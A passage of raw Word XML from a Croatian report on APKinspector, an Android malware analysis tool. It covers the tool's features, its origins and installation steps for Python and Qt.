            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756631 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>43</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756632" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>5.2.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>JAD.py</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756632 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>45</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj3"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756633" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>5.2.4.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:i/>
            <w:iCs/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>StartQT.py</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756633 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>47</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj2"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756634" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>5.3.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Napomene o programu</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756634 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>48</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756635" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>6.</w:t>
        </w:r>
        <w:r w:rsidRPr="00934857">
          <w:rPr>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>Zaključak</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756635 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>49</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRPr="00934857" w:rsidRDefault="00934857">
      <w:pPr>
        <w:pStyle w:val="Sadraj1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc406756636" w:history="1">
        <w:r w:rsidRPr="001F6174">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
          </w:rPr>
          <w:t>7. Literatura</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc406756636 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00925CE0">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>50</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00934857" w:rsidRDefault="00934857">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B4C8C" w:rsidRDefault="008B4C8C" w:rsidP="008B4C8C"/>
    <w:p w:rsidR="008B4C8C" w:rsidRDefault="008B4C8C" w:rsidP="008B4C8C"/>
    <w:p w:rsidR="008B4C8C" w:rsidRDefault="008B4C8C" w:rsidP="008B4C8C"/>
    <w:p w:rsidR="00BE230D" w:rsidRDefault="00BE230D" w:rsidP="00750888"/>
    <w:p w:rsidR="00BE230D" w:rsidRDefault="00BE230D" w:rsidP="00750888">
      <w:pPr>
        <w:sectPr w:rsidR="00BE230D" w:rsidSect="00F73319">
          <w:headerReference w:type="even" r:id="rId9"/>
          <w:footerReference w:type="even" r:id="rId10"/>
          <w:pgSz w:w="11906" w:h="16838" w:code="9"/>
          <w:pgMar w:top="1701" w:right="1134" w:bottom="1701" w:left="1701" w:header="680" w:footer="680" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="708"/>
          <w:docGrid w:linePitch="360"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE230D" w:rsidRPr="00750888" w:rsidRDefault="00BE230D" w:rsidP="00750888"/>
    <w:p w:rsidR="00750888" w:rsidRDefault="00750888" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc73793693"/>
      <w:bookmarkStart w:id="2" w:name="_Toc73794263"/>
      <w:bookmarkStart w:id="3" w:name="_Toc113812202"/>
      <w:bookmarkStart w:id="4" w:name="_Toc159987575"/>
      <w:bookmarkStart w:id="5" w:name="_Toc406756474"/>
      <w:bookmarkStart w:id="6" w:name="_Toc406756587"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Uvod</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="6"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:ind w:firstLine="432"/>
      </w:pPr>
      <w:r>
        <w:t>APKinspector je slobodno dostupni alat za reverzni inženjering i analizu zloćudnih programa namijenjenih  Androidu. Sadrži grafičko sučelje kojim se može prikazati struktura programskih modula što analitičarima omogu</w:t>
      </w:r>
      <w:r w:rsidR="00E22904">
        <w:t>ć</w:t>
      </w:r>
      <w:r>
        <w:t>ava odabir programa sigurnih za korištenje.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:ind w:firstLine="432"/>
      </w:pPr>
      <w:r>
        <w:t>APKinspector može biti koristan dodatak alatima koji se koriste za forenziku zloćudnih programa. Pomaže stvarati izvješća za dopuštenja koje koristi program, traženje i filtriranje Stringova, razreda i metoda, preimenovanje kor</w:t>
      </w:r>
      <w:r w:rsidR="00E22904">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>snika itd. Neki od trenutačnih modela korištenih od APKinspectora su temeljeni na Androguardu.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:ind w:firstLine="432"/>
      </w:pPr>
      <w:r>
        <w:t>Cilj projekta APKinspector je pomoć analitičarima i reverznim inženjerima da vizualiziraju kompajlirane Android pakete i njihove odgovarajuće DEX kodove. Korisnicima pruža i analitičke i grafičke funkcije da bi se stekao duboki uvid u zloćudni program.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:r>
        <w:t>Pruža sljedeće mogućnosti:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CFG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Poziv grafa</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00480A45">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Statička instrumen</w:t>
      </w:r>
      <w:r w:rsidR="00480A45">
        <w:t>tal</w:t>
      </w:r>
      <w:r>
        <w:t>izacija</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Anal</w:t>
      </w:r>
      <w:r w:rsidR="00500539">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t>za dozvola</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Dalvik kodove</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Smali kodove</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Java kodove</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Odlomakpopisa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>APK informacije</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033620B" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:ind w:firstLine="432"/>
      </w:pPr>
      <w:r>
        <w:t>Projekt je napravio Cong Zheng za vrijeme Google Summer of Code 2011. godine, a nadogradio ga je Yuan Tian za vrijeme Google Summer of Code 2012. godine. Napisan je u Pythonu, a koristi se framework PyQT jer pruža potpuno sučelje QT programima i python može jednostavno uzajamno djelovati s Androguardom.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0033620B" w:rsidRDefault="0033620B" w:rsidP="0099402B"/>
    <w:p w:rsidR="0099402B" w:rsidRDefault="0099402B" w:rsidP="0099402B"/>
    <w:p w:rsidR="0099402B" w:rsidRPr="0099402B" w:rsidRDefault="0099402B" w:rsidP="0099402B"/>
    <w:p w:rsidR="00750888" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="_Toc406756475"/>
      <w:bookmarkStart w:id="8" w:name="_Toc406756588"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Izgradnja i instalacija programa APKinspector</w:t>
      </w:r>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Projekt se može preuzeti na stranici https://github.com/honeynet/apkinspector/ , a trenutno je još u alpha fazi s, nažalost, nekolicinom bugova.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Toc406756476"/>
      <w:bookmarkStart w:id="10" w:name="_Toc406756589"/>
      <w:r w:rsidRPr="00012366">
        <w:t>Izgradnja i instalacija zavisnosti</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> programa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc406756477"/>
      <w:bookmarkStart w:id="12" w:name="_Toc406756590"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija Pythona</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:bookmarkEnd w:id="12"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="009B5839">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Da bi se program mogao uspješno pokrenuti, potrebno je imati podršku za programski jezik Python. Da bi naredni koraci mogli biti uspješno izvršeni, preporuč</w:t>
      </w:r>
      <w:r w:rsidR="009B5839">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>uje</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> se instalacija Pythona 2.7 koji se može dohvatiti na sljedećoj poveznici:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="00FF7FB8">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>https://www.python.org/downloads/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Napomena.</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Potrebno je preuzeti inačicu 2.7.*, a korisnik sam odabire između ponuđenih platformi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="00012366">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="00012366" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:pStyle w:val="Naslov3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc406756478"/>
      <w:bookmarkStart w:id="14" w:name="_Toc406756591"/>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Instalacija QT SDK</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve">Potrebno je dohvatiti QtSDK sa stranice </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="00012366">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>https://w</w:t>
        </w:r>
        <w:r w:rsidRPr="00012366">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>w</w:t>
        </w:r>
        <w:r w:rsidRPr="00012366">
          <w:rPr>
            <w:rStyle w:val="Hiperveza"/>
            <w:lang w:val="pl-PL"/>
          </w:rPr>
          <w:t>w.qt.io/download/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t xml:space="preserve"> gdje korisnik može odabrati varijantu programa (Community, Indie Mobile, Proffes</w:t>
      </w:r>
      <w:r w:rsidR="009B5839">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>onal, Enterprise). Preporučuje se odabir Community varijante jer za nju ne treba licenca, dok za druge treba.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRPr="000C77D4" w:rsidRDefault="00012366" w:rsidP="001A1A6B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Windows korisnici</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00012366" w:rsidRDefault="00012366" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>Windows korisnici instaliraju program pokretanjem .exe datoteke. Nakon toga još moraju podesiti varijablu okruženja, a to se uradi tako da se ide u System (na Windows 8 se to uradi desnim klikom na Start ikonu te klikom na System), zatim se odabere Advanced System Settings te se u slijedom iskočenom prozoru odabere Enviro</w:t>
      </w:r>
      <w:r w:rsidR="00F3191C">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ment Variables... . Nakon što iskoči još jedan prozor</w:t>
      </w:r>
      <w:r w:rsidR="00F82890">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>, treba se osigurati da je odab</w:t>
      </w:r>
      <w:r w:rsidR="00F3191C">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>ra</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>na varijabla PATH te se klikne na EDIT... i na kraju Variable value: se doda „</w:t>
      </w:r>
      <w:r w:rsidRPr="000C77D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>;folder_gdje_je_instaliran_Qt/verzija/alat_programiranja/bin;</w:t>
      </w:r>
      <w:r w:rsidRPr="00012366">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>“ (bez navodnika)</w:t>
      </w:r>
      <w:r w:rsidR="000C77D4">
        <w:rPr>
          <w:lang w:val="pl-PL"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000C77D4" w:rsidRPr="00012366" w:rsidRDefault="000C77D4" w:rsidP="000C77D4">
      <w:pPr>
        <w:ind w:firstLine="360"/>
        <w:rPr>
